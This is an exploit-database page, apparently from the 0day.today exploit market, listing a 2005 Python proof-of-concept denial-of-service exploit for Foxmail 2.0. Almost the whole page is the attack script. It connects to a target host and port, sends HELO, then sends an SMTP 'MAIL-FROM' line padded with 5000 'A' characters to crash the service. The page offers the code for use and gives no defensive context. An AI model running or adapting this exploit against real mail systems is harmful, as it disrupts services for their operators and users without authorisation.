[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Foxmail 2.0 (MAIL FROM:) Denial of Service Exploit

Author
OYXin
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5949
Category
dos / poc
Date add
07-02-2005
Platform
unsorted
==================================================
Foxmail 2.0 (MAIL FROM:) Denial of Service Exploit
==================================================



#!/usr/bin/python
#Code by OYXin
#oyxin_at_segfault.cn
import socket
import sys
import getopt


def usage():
    print "Usage: foxserver.py -h host -p port"
    sys.exit(0)
    
if __name__ == '__main__':
    
    try: 
        opts, args = getopt.getopt(sys.argv[1:], "h:p:") 
    except getopt.GetoptError, msg: 
        print msg
        usage()
        
    for o,a in opts:
        if o in ["-h"]:
            host = a
        if o in ["-p"]:
            port = int(a)

    evilbuf =  "MAIL-FROM: <" + "A"*5000 + ">" + "\r\n"
    evilbuf += "RCPT-TO: postmaster@company.mailDATA" + "\r\n"
    evilbuf += "Message-ID: 123" + "\r\n"
    evilbuf += "ASDF" + "\r\n"
    evilbuf += "." + "\r\n"
    evilbuf += "QUIT" + "\r\n"
    try:
        sockfd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sockfd.connect((host, port))
        recvbuf = sockfd.recv(1024)
        print `recvbuf`
        sockfd.send("HELO localhost\r\n")
        recvbuf = sockfd.recv(1024)
        print `recvbuf`
        sockfd.send(evilbuf)
    except socket.error, msg:
        print msg
        
    sockfd.close()



#  0day.today [2024-11-16]  #